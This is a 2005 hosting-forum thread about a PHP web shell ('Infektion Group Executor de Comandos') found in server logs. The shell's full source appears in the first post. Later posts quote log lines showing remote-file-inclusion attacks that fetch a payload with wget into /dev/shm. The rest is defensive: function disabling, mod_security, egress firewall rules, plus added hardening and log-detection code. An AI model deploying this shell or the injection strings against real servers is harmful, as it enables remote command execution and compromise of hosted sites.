
Thread: server hacked

  1. #1

    server hacked

    Among the many attempts to hack my server weekly, I found this URL in my logs attempting to run a PHP script using some scripts on my server.

    thecurse.pop.com.br/cmd.txt

    It appears as though they are trying to expose writable directories on my clients' domains and put the contents of those directories in an HTML <textarea> field. What the real purpose is I don't know, but I suspect it's not good. Last week Monday a hacker managed to send out thousands of phishing spams to AOL accounts using old formmail scripts some of my clients were running on their sites. How they found out which domains had these scripts is unknown to me. I suspect I have a client on my server currently doing something they shouldn't be doing.

    In case they take down the domain here is the code:

    <?php
    // enviar ("send"): copy the file $arquivo (source) to $destino (destination); the shell's upload/copy primitive.
    function enviar($arquivo, $destino){
    $ea = @fopen($arquivo,"r");
    $ea2 = @fopen($destino,"w");
    fwrite($ea2, "");             // truncate the destination, then reopen it for appending
    $ea2 = @fopen($destino,"a+");
    for(;;){                      // endless loop; the forum turned the ";)" of "for(;;)" into a smiley, which garbled this line
    $read = @fread($ea, 8192);
    if(empty($read)) break;
    $ok = fwrite($ea2, $read);
    if(empty($ok)){ echo "<center>Erro</center>"; break; }                 // "Error"
    if(!empty($ok)){ echo "<center>Arquivo Enviado</center>"; break; }}}   // "File sent"; it also breaks after the first 8 KiB chunk, a defect in the shell itself
    ?>

    <p><center><h1><font color=#FF0000 face=Verdana><b>Infektion Group</b></font></h1>
    <b><font color=#FF0000 face=Verdana size=4>Executor de Comandos v4.6</font></br></p>   <!-- "Command Executor v4.6" -->

    <?
    closelog();
    $uid = posix_getuid();   // uid/gid the script runs as: the web server's, or the site owner's under phpsuexec
    $gid = posix_getgid();
    // $chdir, $cmd, $listar, $u, $di and $de are never read from $_GET/$_POST explicitly:
    // the shell relies on register_globals to turn query-string parameters into these variables.
    if($chdir == "") $chdir = posix_getcwd();
    if(@is_writable($chdir)){ $perm = "sim"; } else { $perm = "nao"; }   // "yes" / "no"
    ?>

    <font color=#000000 face=verdana size=2>
    <?
    $uname = posix_uname();   // banner: kernel/host information, uid/gid, current directory, writability
    echo "<br>";
    while (list($info, $value) = each ($uname)) {
    echo "$value "; }
    echo "</br><br>uid=$uid gid=$gid</br>";
    echo "<br>Diretório Atual: $chdir</br>";       // "Current directory"
    echo "<br>Permissao de Escrita: $perm</br>";   // "Write permission"
    ?>

    <? if(isset($cmd)){ ?>
    </b></font><br><font face=verdana size=3 color=#FF0000>Comando</br>   <!-- "Command" -->
    </font><font face=verdana size=2 color=#000000><textarea cols=75 rows=8>
    <?php
    if(isset($chdir)) @chdir($chdir);
    ob_start();
    passthru("$cmd 2>&1");   // ?cmd=... is run through the system shell, stderr merged into stdout
    $output = ob_get_contents();
    ob_end_clean();

    if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));   // HTML-escape the output for the textarea

    ?>
    </TEXTAREA>
    <?php } ?>

    <? if(isset($listar)){ ?>
    <font face=verdana size=2 color=#000000><textarea cols=75 rows=8>
    <?
    // listar ("list"): print every writable entry of the directory given in ?listar=...
    // (this is the "expose writable directories" behaviour seen in the logs)
    if($dir = opendir($listar)){
    while (false !== ($arquivo = readdir($dir))){
    if($arquivo != "." && $arquivo != "..") {
    $arq = $listar.'/'.$arquivo;
    if(@is_writable($arq)){ echo "$arq\n"; }}}
    closedir($dir); }}
    ?>
    </textarea></font>

    <? if(isset($u)){ enviar($di, $de); } ?>   <!-- ?u=1&di=<source>&de=<destination> copies a file -->

  2. #2
    Join Date
    Oct 2003
    Location
    Long Island, New York
    Posts
    220
    This is highly common... I run prelude/snort and pick these attacks up all the time. You should be prepared to defend yourself, because these types of attacks occur constantly.
    TWSites.com - Business Web Hosting Solutions & Server Management Since 2003

  3. #3
    install mod_sec... first.

    Run phpsuexec... Won't be able to execute things except with their user privileges.

    read about PHP security ( you should disable some functions... )

    There are a lot of tutorials on the net about PHP security ...

  4. #4
    This isn't a server hacking attempt and it isn't really that special. It's a spammer finding insecure scripts by scanning sites, just like they always do. It's also not related to formmail scripts, but more to insecure PHP scripts, most likely phpBB with that script. You need to find which of your clients has insecure installations. They probably don't even know their account is being used like this.

  5. #5
    Join Date
    Jan 2004
    Posts
    1,183
    This webpage (thecurse.pop.com.br) is being hosted in Brazil on a free web hosting service provided by the ISP.


    You should use a security layer to filter the bad code and bugs in scripts.


    Anyway, good luck.

    Don't forget to run rkhunter and chkrootkit to see if you were hacked on root.

  6. #6
    Join Date
    Apr 2003
    Location
    NC
    Posts
    3,080
    As others have suggested a good mod_security ruleset will help block out stuff like this. Also setting wget to chmod 700 will block many of these problems, though now curl and other methods of downloading files are becoming popular.
    John W, CISSP, C|EH
    MS Information Security and Assurance
    ITEagleEye.com - Server Administration and Security
    Yawig.com - Managed VPS and Dedicated Servers with VIP Service

  7. #7
    Won't that code help other people to hack people as well?

  8. #8
    Join Date
    Oct 2003
    Location
    Long Island, New York
    Posts
    220
    These attacks occur so often that if you simply keep a site on the internet and keep your eyes open you'll be hit eventually... I don't think there's any risk of publishing it, at least some people will know what we're dealing with.

  9. #9

    What Now

    I was hacked yesterday by the Infektion Group. I have stopped several php functions but is there anything else I should do with the server.

  10. #10
    If you have access to php.ini, look up disable_functions. Here, you can place all the functions you don't want PHP to be able to use.

    Hope this helps.
    PHP / MySQL Ecommerce programmer
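A php.ini fragment, added here as an example rather than taken from the thread, showing the settings the shell in post #1 and the delivery described in post #13 depend on, with the common 2005-era defaults commented out beside hardened values. The function list is a suggestion based on what that shell calls; how many of them a shared host can afford to disable depends on its users' scripts (post #17's caveat).

```ini
; Added example, not from the thread: php.ini settings behind the attack in posts #1 and #13.
; The commented "before" values are the common defaults of the time.

; --- before ---
; allow_url_fopen   = On     ; lets include() and fopen() pull http:// URLs (how pages.php?area=http://... fetched the shell)
; register_globals  = On     ; turns ?cmd=... into $cmd, which the shell in post #1 relies on
; disable_functions =        ; nothing blocked: passthru() runs the attacker's command

; --- after ---
allow_url_fopen   = Off      ; breaks scripts that fetch remote content; if you must keep it On,
allow_url_include = Off      ;   rely on this one instead (PHP 5.2 and later; older releases ignore it)
register_globals  = Off
; The command-execution entry points, including the passthru() the posted shell uses.
; disable_functions is a system-level directive: it can only be set in php.ini or the main
; httpd.conf, so a site cannot re-enable any of these from .htaccess.
disable_functions = passthru,system,exec,shell_exec,proc_open,popen
```

With phpsuexec (post #3) or a per-virtual-host php.ini, the function list can be scoped to the accounts that need the restriction instead of the whole server.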

  11. #11
    I did disable the exec and shell_exec and the like. I also chmod wget to 000 which may have some ill effects, not sure yet.

    I also located the script which caused this mess.

    200.209.52.2 - - [12/May/2005:13:00:23 -0400] "GET /images/title-htt%jipc%r%r/weather_old/cmd2.jpg?.jpg HTTP/1.0" 302 296 "htwww%%somesite%%com/pages.php?main=ht/jipc%r%kr/weather_old/cmd2.jpg?&cmd=cd%20/dev/shm;%20wget%20www%thecurse%pop%com%b/b/cgi%20-O%20httpd" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; FDM)"

  12. #12
    Join Date
    Jun 2003
    Posts
    961
    Originally posted by tomham

    I also located the script which caused this mess.

    200.209.52.2 - - [12/May/2005:13:00:23 -0400] "GET /images/title-htt%jipc%r%r/weather_old/cmd2.jpg?.jpg HTTP/1.0" 302 296 "htwww%%somesite%%com/pages.php?main=ht/jipc%r%kr/weather_old/cmd2.jpg?&cmd=cd%20/dev/shm;%20wget%20www%thecurse%pop%com%b/b/cgi%20-O%20httpd" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; FDM)"
    what is that scripts name? url?

  13. #13
    200.209.52.2 - - [12/May/2005:13:00:23 -0400] "GET /images/title-http://jipc.or.kr/weather_old/cmd2.jpg?.jpg HTTP/1.0" 302 296 "http://www.somehost.com/pages.php?area=http://jipc.or.kr/weather_old/cmd2.jpg?&cmd=cd%20/dev/shm;%20wget%20www.thecurse.pop.com.b/b/cgi%20-O%20httpd" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; FDM)"

    This is from my logs; I changed the domain, obviously. But this is the injection script that was used. So hopefully this helps someone out.
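The log line above, run through a small detector added here as an example (not code from the thread): it parses Apache combined-format lines, pulls the query parameters out of both the request line and the Referer, flags any parameter whose value is a remote URL, and decodes a `cmd` payload when one rides along in the same query. The two extra log lines are constructed for the example. Scanning the Referer is the point: in the line above the request itself is only the image fetch the injected page triggered, and the real `pages.php?area=http://...&cmd=...` exploit sits in the Referer field, so a scanner that looks at request paths alone misses it.

```php
<?php
declare(strict_types=1);

// Added example, not from the thread. Apache "combined" log format:
// client ident user [time] "METHOD path PROTO" status bytes "referer" "user-agent"
const COMBINED_RE = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/';

/** Return the URL-decoded query parameters of a URL or request path (empty if it has none). */
function query_params(string $url): array
{
    $pos = strpos($url, '?');
    if ($pos === false) {
        return [];
    }
    parse_str(substr($url, $pos + 1), $params);
    return $params;
}

/** True if a parameter value is something include()/fopen() would fetch over the network. */
function is_remote_url(string $value): bool
{
    return (bool) preg_match('#^(?:https?|ftp)://#i', $value);
}

/**
 * Inspect one log line. Returns null for benign traffic, otherwise an array describing the
 * suspected remote inclusion: the client, where the URL was found, the parameter, the URL,
 * and the decoded "cmd" payload if the same query carried one.
 */
function analyze_line(string $line): ?array
{
    if (!preg_match(COMBINED_RE, $line, $m)) {
        return null; // not combined format; a real scanner would count these separately
    }
    [, $client, $when, $method, $path, $status, $referer] = $m;

    // Check the request line first, then the Referer. In the thread's line the request is
    // only the follow-up image fetch; the payload is in the Referer.
    foreach (['request' => $path, 'referer' => $referer] as $field => $url) {
        $params = query_params($url);
        foreach ($params as $name => $value) {
            if (is_string($value) && is_remote_url($value)) {
                $cmd = $params['cmd'] ?? null;
                return [
                    'client'  => $client,
                    'time'    => $when,
                    'request' => "$method $path",
                    'status'  => (int) $status,
                    'field'   => $field,
                    'param'   => (string) $name,
                    'include' => $value,
                    'cmd'     => is_string($cmd) ? $cmd : null,
                ];
            }
        }
    }
    return null;
}

/** Scan many lines and return only the suspicious ones, tagged with their line number. */
function scan_log(array $lines): array
{
    $hits = [];
    foreach ($lines as $i => $line) {
        $hit = analyze_line(trim($line));
        if ($hit !== null) {
            $hit['line'] = $i + 1;
            $hits[] = $hit;
        }
    }
    return $hits;
}

// Sample input: the line from post #13 (host names as posted there), followed by two
// constructed lines, one benign and one hitting pages.php directly.
$sample = <<<'LOG'
200.209.52.2 - - [12/May/2005:13:00:23 -0400] "GET /images/title-http://jipc.or.kr/weather_old/cmd2.jpg?.jpg HTTP/1.0" 302 296 "http://www.somehost.com/pages.php?area=http://jipc.or.kr/weather_old/cmd2.jpg?&cmd=cd%20/dev/shm;%20wget%20www.thecurse.pop.com.b/b/cgi%20-O%20httpd" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; FDM)"
10.0.0.5 - - [12/May/2005:13:05:00 -0400] "GET /pages.php?area=news HTTP/1.1" 200 1532 "http://www.somehost.com/" "Mozilla/5.0 (constructed benign line)"
198.51.100.7 - - [12/May/2005:13:07:41 -0400] "GET /pages.php?area=http://evil.example/cmd.txt?&cmd=id HTTP/1.0" 200 4120 "-" "Mozilla/4.0 (constructed attack line)"
LOG;

foreach (scan_log(explode("\n", $sample)) as $hit) {
    printf("line %d: %s sent a remote URL in %s parameter '%s': %s\n",
        $hit['line'], $hit['client'], $hit['field'], $hit['param'], $hit['include']);
    if ($hit['cmd'] !== null) {
        printf("    decoded cmd: %s\n", $hit['cmd']);
    }
}
```

Run with `php detect_rfi.php`; the first and third sample lines are reported (the first via the Referer, with the `cd /dev/shm; wget ... -O httpd` command decoded), the benign second line is not. For a live log, replace `$sample` with the file contents and feed the hits to whatever alerting you already have; the same `wget ... -O httpd` pattern is what the egress filtering suggested later in the thread is meant to stop.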

  14. #14
    Join Date
    Dec 2001
    Location
    Netherlands
    Posts
    780
    Hi,

    What firewall are you using?

    If you are not using any firewalls at all, I would like you to try shorewall (though APF might also have this feature) and configure rules that will allow privileged outside connections only.

    A simple example is only root can initiate connections outside on ports 20, 21, 80, 110 and 443 and so on. Ports 25 and 53 remain open so that other processes can query DNS and send emails.

    If anyone tries to ftp/wget/curl/lynx/elinks/(a dozen other perl modules to help download) and a dozen more other commands, they are simply denied and the attempt logged.

    Cheers,
    Experienced OpenStack Admin For Hire
    regular as admin0 on freenode IRC on #openstack and #openstack-ansible channels

  15. #15
    Join Date
    Apr 2003
    Location
    NC
    Posts
    3,080
    The only bad thing about what admin0 suggested is that it will break some other scripts. I would be very careful when you start to block outgoing 80 because it will break websites that retrieve content from others. It is a great idea but I have found in general it usually causes more trouble than it is worth.

  16. #16
    Join Date
    Jun 2003
    Posts
    961
    Originally posted by tomham
    200.209.52.2 - - [12/May/2005:13:00:23 -0400] "GET /images/title-http://jipc.or.kr/weather_old/cmd2.jpg?.jpg HTTP/1.0" 302 296 "http://www.somehost.com/pages.php?area=http://jipc.or.kr/weather_old/cmd2.jpg?&cmd=cd%20/dev/shm;%20wget%20www.thecurse.pop.com.b/b/cgi%20-O%20httpd" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; FDM)"
    what script is that "pages.php"? public one?

  17. #17
    Join Date
    Sep 2002
    Location
    Top Secret
    Posts
    11,687
    I did disable the exec and shell_exec and the like.
    disabling exec and shell_exec is pretty extreme, and in many cases can cause bad things to happen, especially if you have other users on your server.
    Secure your code!!!!!!!!
    If you secure your code, this won't happen. Make sure that you have a default case for area and that it doesn't stray off, something like
    Code:
    default:
    main();
    break;
    would work, but you need to modify that to work with you code.
    This is THE most common cause of hacks, right here, insecure code allowing for vulnerabilities like this. Unfortunately, those producing this kind of code make it harder on everyone else to maintain a decent and secure server. Learn what you're doing, secure your code, before just sending it out there for the world to abuse, because, they WILL abuse it.
    WHMCS Guru - WHMCS addons, management, support and more.
    WHMCS Notifications Extended - Add slack, hipchat, SMS, pushover to WHMCS !!
    Always looking for Linux, WHMCS, Support Desk work. PM for details
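The `area` handling post #17 describes, as an added example (not the poster's code and not the site's actual `pages.php`): the vulnerable include pattern beside a hardened version that maps page names to local files and falls back to the main page for anything else, which is the "default case" the post asks for. The page names and file paths are assumed for the illustration.

```php
<?php
declare(strict_types=1);

// Added example, not the poster's code. Page names and file paths are assumed.

// --- The pattern post #17 describes (vulnerable; shown for contrast, never called) ---
// The page name comes straight from the request and reaches include() unchecked. With
// allow_url_fopen on (or allow_url_include on PHP 5.2+), a request such as
//     pages.php?area=http://attacker.example/cmd.txt?
// makes PHP fetch and execute cmd.txt; the trailing "?" turns the appended ".php" into a
// harmless query string on the attacker's server. With URL wrappers off it is still a
// local file inclusion via ../ sequences.
function render_page_vulnerable(string $area): void
{
    include $area . '.php';
}

// --- Hardened form: a fixed map from page names to local files, plus a default ---
// Only the keys of this map are ever used; the request value itself never touches the
// file system, so neither remote URLs nor ../ sequences have any effect.
const PAGES = [
    'main'    => __DIR__ . '/pages/main.php',
    'news'    => __DIR__ . '/pages/news.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

/** Map the request's "area" value to a known file, falling back to the main page. */
function resolve_page(?string $area): string
{
    if ($area !== null && array_key_exists($area, PAGES)) {
        return PAGES[$area];
    }
    return PAGES['main'];   // the "default:" case of post #17's switch
}

function render_page(?string $area): void
{
    include resolve_page($area);
}

// In the real page this would be: render_page($_GET['area'] ?? null);
// Here we only show which file each hypothetical request value resolves to.
foreach (['news', 'http://attacker.example/cmd.txt?', '../../../etc/passwd', null] as $req) {
    printf("%-36s -> %s\n", var_export($req, true), basename(resolve_page($req)));
}
```

The map is equivalent to the `switch` with a `default:` branch that post #17 sketches; the property that matters is that every branch names a file the developer chose, and the request only selects among them. This also removes the reliance on `register_globals` that the shell in post #1 exploits, since `$area` is read from `$_GET` explicitly.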

  18. #18
    Join Date
    Jan 2002
    Posts
    269
    Originally posted by admin0
    Hi,
    example is only root can initiate connections outside on ports 20, 21, 80, 110 and 443 and so on. Ports 25 and 53 remain open so that other processes can query DNS and send emails.
    I'm trying to do that in APF.
    Are there other ports besides 20,21,80,110 and 443 to keep open for root on a cpanel server? I am thinking of 465,873 and 2089 for example.

    I would really appreciate if you could list all ports that need remain open for root only.

  19. #19
    Join Date
    Dec 2001
    Location
    Netherlands
    Posts
    780
    As eth00 raised a valid concern: it breaks scripts that get content from other websites, and that is the whole point. Block everything, open only a selected few. Go ahead and block port 80; if a user complains he is not able to get news from google.com, open the firewall for outgoing port 80 to news.google.com, and so on. You can then be assured that, using over two dozen applications (including perl modules), users can only get the content you allow, and not download any hacks for other websites.


    I have been using the following ruleset for almost two dozen cpanel servers for almost 2 years, and without any issues.

    20 root
    21 root
    22 root
    25
    26
    37
    43
    53
    80 root
    113 root
    465
    443 root
    873 root
    2089 root
    3306

    Rest of outgoing connections are denied and logged.

    Cheers,
    Last edited by admin0; 05-15-2005 at 01:15 PM.

  20. #20
    Join Date
    Jan 2002
    Posts
    269
    Excellent, thanks admin0
